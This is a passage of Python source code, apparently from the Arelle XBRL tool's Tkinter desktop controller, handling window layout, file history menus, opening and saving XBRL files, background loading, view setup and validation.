self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if tbControl is not None:
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.showTitle(filename=None)
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
self.setValidateTooltipText()
def useFactIndexCheckUncheck(self): #TODO: useFactIndex
self.useFactIndex = not self.useFactIndex
def showTitle(self, modelXbrl=None, filename=None):
reportName = None
if filename is None:
if modelXbrl is None:
filename = "Unnamed"
else:
filename = os.path.basename(modelXbrl.modelDocument.uri)
if modelXbrl is not None and modelXbrl.reportName is not None:
reportName = modelXbrl.reportName
if reportName is None:
self.parent.title(_("arelle - {0}").format(filename))
else:
self.parent.title(_("arelle - {0} - {1}").format(filename, reportName))
# worker threads to show title
def triggerShowTitle(self, modelXbrl=None, filename=None):
if self.testMode:
self.showTitle(modelXbrl, filename)
else:
self.uiThreadQueue.put((self.showTitle, [modelXbrl, filename]))
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
modelXbrl = self.getModelXbrl()
self.showTitle(modelXbrl=modelXbrl)
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), self.fileHistorySize ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), self.fileHistorySize ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.showTitle(filename=None)
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def getModelXbrl(self):
view, modelXbrl = self.getViewAndModelXbrl()
return modelXbrl
def okayToContinue(self):
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
def fileSave(self, event=None, view=None, fileType=None,
filenameFromInstance=False, initialfile=None, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if self.testMode:
for pluginMenuExtender in pluginClassMethods("DevTesting.GetFilePath"):
filename = pluginMenuExtender(self, modelXbrl)
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html",
initialfile=initialfile)
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
view = ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
modelXbrl.guiViews.tableView = view
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".csv")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > self.fileHistorySize:
fileHistory[self.fileHistorySize:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False, reportName=None):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.EFM)
filesource.reportName = reportName
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
if self.testMode:
self.backgroundLoadXbrl(filesource,importToDTS,selectTopView)
else:
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"))
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
if filesource.reportName is None:
entryPoint = modelXbrl.getSingleSchemaRef()
if entryPoint is not None:
for pluginMethod in pluginClassMethods("GetReportNameFromEntryPoint"):
reportName = pluginMethod(self, entryPoint)
if reportName is not None:
modelXbrl.reportName = reportName
break
# try the hard way
self.modelManager.getReportNameFromSchemaRef(entryPoint)
else:
modelXbrl.reportName = filesource.reportName
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs %s"),
(action, statTime, filesource.url)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
if self.testMode:
self.showLoadedXbrl(modelXbrl, importToDTS, selectTopView)
else:
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs %s"),
(action, time.time() - startedAt, filesource.url)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
displayTaxonomyTabs = True
for displayTaxonomyTabsMethod in pluginClassMethods("CntlrWinMain.Tabs.DisplayTaxonomyTabs"):
displayTaxonomyTabs = displayTaxonomyTabs and displayTaxonomyTabsMethod() # runs in GUI thread
viewDTS = True
for viewDTSMethod in pluginClassMethods("viewDTS"):
viewDTS = viewDTS and viewDTSMethod()
viewProperties = True
for viewPropertiesMethod in pluginClassMethods("viewProperties"):
viewProperties = viewProperties and viewPropertiesMethod()
viewConcepts = True
for viewConceptsMethod in pluginClassMethods("viewConcepts"):
viewConcepts = viewConcepts and viewConceptsMethod()
try:
if attach:
modelXbrl.closeViews()
self.showTitle(modelXbrl=modelXbrl)
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
view = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
modelXbrl.guiViews.tableIndexView = view
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl)
if firstTableLinkroleURI:
view = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
modelXbrl.guiViews.tableIndexView = view
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of tests"
if viewDTS:
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
if viewConcepts:
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
view = ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
modelXbrl.guiViews.tableView = view
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
modelXbrl.guiViews.factTableView = ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI)
if topView is None: topView = modelXbrl.views[-1]
if displayTaxonomyTabs:
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if displayTaxonomyTabs:
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
currentAction = "dimensions relationships view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
if viewProperties:
currentAction = "property grid"
modelXbrl.guiViews.propertiesView = ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
if self.filename is None:
view = getattr(self, "currentView", None)
if view is not None:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if modelXbrl is not None:
try:
ff = modelXbrl.modelDocument.filepath
if ff.endswith('.xsd'):
saved = False
for pluginXbrlMethod in pluginClassMethods("CntlrWinMain.Rendering.SaveNewFileFromGUI"):
stopPlugin, saved = pluginXbrlMethod(self)
if stopPlugin:
break;
if not saved:
self.modelManager.close()
self.showTitle(filename=None)
self.currentView = None
except AttributeError:
pass
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
modelXbrl = self.getModelXbrl()
if modelXbrl is None:
modelXbrl = self.modelManager.modelXbrl
if modelXbrl is None:
return
filename = modelXbrl.uri
if self.testMode:
for pluginMenuExtender in pluginClassMethods("DevTesting.FileCloseStart"):
pluginMenuExtender(self, modelXbrl)
self.modelManager.close(modelXbrl=modelXbrl)
self.showTitle(filename=None)
self.setValidateTooltipText()
self.currentView = None
modelXbrl = None
if self.testMode:
for pluginMenuExtender in pluginClassMethods("DevTesting.FileCloseEnd"):
pluginMenuExtender(self, filename)
def validate(self):
modelXbrl = self.getModelXbrl()
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
if self.testMode:
self.backgroundValidate()
else:
thread = threading.Thread(target=lambda: self.backgroundValidate())
thread.daemon = True
thread.start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.getModelXbrl()
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate(modelXbrl=modelXbrl)
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt), file=modelXbrl.modelDocument.filepath)
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
if self.testMode:
self.showFormulaOutputInstance(priorOutputInstance, modelXbrl.formulaOutputInstance)
else:
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
if self.testMode:
self.logSelect()
else:
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
thread.daemon = True
thread.start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
